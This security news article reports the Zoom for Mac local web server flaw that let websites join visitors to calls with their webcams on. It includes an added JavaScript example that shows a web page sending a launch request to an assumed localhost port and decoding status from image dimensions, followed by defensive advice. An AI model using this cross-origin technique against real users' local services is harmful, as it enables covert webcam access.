Vulnerability in Zoom for Mac calling app could let others watch webcams
A flaw in the Mac version of the popular video conferencing app Zoom makes it possible for a malicious website to watch users through their own webcams. Zoom itself calls the mechanism behind the flaw a "workaround" for limitations in Safari on macOS.
The vulnerability was discovered in May by a security researcher who reported it to Zoom. The company has since released a patch. Researcher Jonathan Leitschuh is now publishing the details, but also says that some of the repairs Zoom has made are little more than band-aids. Zoom says it is starting a bug bounty program in response to the vulnerability.
Zoom is a video conferencing app with more than four million users on the Mac. It is mainly used by business users to set up calls and add participants to them. It is precisely the authentication around joining a call that leaves a lot to be desired.
When a user installs Zoom on a Mac, the installer also starts a local web server on the machine. That server exposes an API through which a web page can launch the Zoom client and add the user to a call, so that other apps and websites can communicate with the Zoom app. According to Leitschuh, this gives the app far more capabilities than it needs. “The fact that you are installing an app that puts a web server on my local machine and whose API is not documented is very dubious to me,” he writes. “And if every website I visit can talk to this web server running on my machine, I see that as a big threat.” Leitschuh found that a single HTTP GET request to the API was enough to pull a visitor's Zoom client into any meeting whose conference number he knew.
Leitschuh found that Zoom does not use standard AJAX requests for this API. Instead, the local server answers with images whose dimensions encode a status: a 1 by 1 pixel image means everything is fine, for example, while a 2 by 3 image means an update failed to download. According to the researcher, Zoom uses this unusual approach to get around the browser's Cross-Origin Resource Sharing (CORS) restrictions, which Safari 12 enforces: a web page is not allowed to read a response from a server on another origin such as localhost, but it can load an image from that origin and inspect the image's size. While investigating, he also discovered that the app had far more access to the system than he initially thought. Because Zoom runs a server like this on every Mac it is installed on, a future vulnerability in that server could do considerable damage to a victim's machine, the researcher says. He points to a vulnerability in Zoom patched six months earlier that allowed remote code execution.
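To make the two mechanisms above concrete, here is an added example, written for this page and not taken from Zoom's software or from Leitschuh's proof of concept, of how a web page drives a localhost HTTP API through an `<img>` element and reads a status back from the image's dimensions. The port 19421, the `/launch` path and the `action`/`confno` query parameters are assumptions for illustration, as is the 9 to 11 digit range for a conference number; the two status sizes are the ones the article names, and anything else is reported as unknown rather than guessed. In a browser the request is sent simply by setting `img.src`; outside a browser the block substitutes a stub image so the flow runs offline.

```javascript
// Added example for this page: not Zoom's code and not Leitschuh's proof of concept.
// Shows how a web page can drive a local HTTP API through an <img> element and read
// a status back from the image's dimensions, which CORS does not hide.
// ASSUMPTIONS: the port, path, parameter names and digit range are illustrative.

const ASSUMED_PORT = 19421;     // assumed listening port of the local server
const ASSUMED_PATH = '/launch'; // assumed API path

// Build the single GET request an attacker-controlled page would embed.
// Only a plain numeric conference number is accepted (9-11 digits is an assumption);
// the point is that nothing else can end up in the query string.
function buildLaunchUrl(confno, port = ASSUMED_PORT) {
  if (!/^\d{9,11}$/.test(String(confno))) {
    throw new Error('conference number must be 9 to 11 digits');
  }
  const url = new URL(`http://localhost:${port}${ASSUMED_PATH}`);
  url.searchParams.set('action', 'join');
  url.searchParams.set('confno', String(confno));
  return url.toString();
}

// Status table: the two sizes named in the article. Any other size is reported
// as unknown rather than mapped, so a changed server cannot be misread as "ok".
const STATUS_BY_SIZE = new Map([
  ['1x1', 'ok'],
  ['2x3', 'update-download-error'],
]);

function decodeStatus(width, height) {
  const key = `${width}x${height}`;
  return STATUS_BY_SIZE.has(key) ? STATUS_BY_SIZE.get(key) : `unknown(${key})`;
}

// Why an image: a cross-origin <img> load is not subject to CORS. The page never
// sees the response body, but it does get load/error events plus
// naturalWidth/naturalHeight, and two small integers are enough to carry a
// status code from the local server back to the page.
function probeViaImage(url, { timeoutMs = 5000, ImageCtor = globalThis.Image } = {}) {
  if (typeof ImageCtor !== 'function') {
    return Promise.reject(new Error('no Image constructor here; run this part in a browser'));
  }
  return new Promise((resolve, reject) => {
    const img = new ImageCtor();
    const timer = setTimeout(
      () => reject(new Error('timeout: nothing listening on that port?')), timeoutMs);
    img.onload = () => {
      clearTimeout(timer);
      resolve(decodeStatus(img.naturalWidth, img.naturalHeight));
    };
    img.onerror = () => {
      clearTimeout(timer);
      reject(new Error('request failed or response was not an image'));
    };
    img.src = url; // setting src sends the GET; no click or dialog is involved
  });
}

// Stub standing in for the browser's Image outside a browser, so the flow runs
// offline. It "loads" a constructed 2x3 image, i.e. the update-error status.
class StubImage {
  set src(_url) {
    this.naturalWidth = 2;
    this.naturalHeight = 3;
    setTimeout(() => this.onload && this.onload(), 0);
  }
}

// Stand-alone demo outside a browser.
if (typeof window === 'undefined') {
  probeViaImage(buildLaunchUrl('123456789'), { ImageCtor: StubImage })
    .then((status) => console.log('server status:', status));
}
```

The defensive lesson is the mirror image of the attack: a local server that answers any origin hands every website the visitor opens a capability on the machine, and the same-origin policy does not help because the image channel leaks enough to drive the API. Not exposing such a server at all is the robust fix; short of that, a local API has to check the `Origin` header and require a per-install secret that a third-party page cannot know.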
Zoom has since released a patch that fixes part of the problem. Requests to the local server now carry a signature by default, for example, but according to Leitschuh the flaw can still be exploited. Hosts can also configure a meeting so that participants' video is off when they join. Leitschuh says the vulnerability can be triggered as a drive-by attack, for instance when a user is lured to a malicious website through a phishing link.
Update July 10: Zoom is dropping the local web server after all. A software update will remove the server outright, the company writes in a blog post. Zoom says that it initially saw no problem in using a local server, but that after the strong reaction from users it has opted for a different solution.